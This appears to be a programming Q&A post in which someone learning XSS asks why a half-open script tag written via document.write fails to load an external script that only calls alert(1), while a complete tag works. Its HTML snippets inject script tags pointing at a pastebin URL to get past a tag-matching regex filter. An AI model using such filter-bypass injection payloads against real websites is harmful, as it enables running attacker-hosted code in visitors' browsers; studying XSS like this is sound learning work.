# Why half open script tag doesn't works as correct one?

Tags: javascript, html, xss

I'm learning XSS and I'm testing the half open tag for attacking the website which only checks the `<\/?[^>]+>`(the correct tag regular expression)...

**Html**:

```
<script>
    document.write('<article> <script src="http://pastebin.com/raw/WY3EPias"> <\/script> </article>')//alert 1
    document.write('<article> <script src="http://pastebin.com/raw/WY3EPias" </article>')// doesn't works
</script>
```

**External JS**:

```
http://pastebin.com/raw/WY3EPias: alert(1)
```

In my Chrome, the the page src code:

**Correct tag**:

```
<html>
<head>
    <script>
        document.write('<article> <script src="http://pastebin.com/raw/WY3EPias"> <\/script> </article>')
        //document.write('<article> <script src="http://pastebin.com/raw/WY3EPias" </article>')
    </script>
</head>
<body>
<article>
    <script src="http://pastebin.com/raw/WY3EPias"></script>
</article>
</body>
</html>
```

**Half open tag**:

```
<html>
<head>
    <script>
        //document.write('<article> <script src="http://pastebin.com/raw/WY3EPias"> <\/script> </article>')
        document.write('<article> <script src="http://pastebin.com/raw/WY3EPias" </article>')
    </script>
</head>
<body>
<article>
    <script src="http://pastebin.com/raw/WY3EPias" <="" article="">
    </script>
</article>
</body>
</html>
```

They are almost the same but there are some weird attributes with `script` tag in half open one. However, the half open script tag doesn't refer the external JS, and doesn't alert of course.

So, could any body explain the reason about why my half open script tag doesn't refer the external JS?

PS:

I tried that html(`script` tag with weird attributes) in my Chrome, it will alert... So, I think the weird attributes doesn't matter in this case.

```
<html>
<head>

</head>
<body>
<article>
    <script src="http://pastebin.com/raw/WY3EPias" <="" article="">
    </script>
</article>
</body>
</html>
```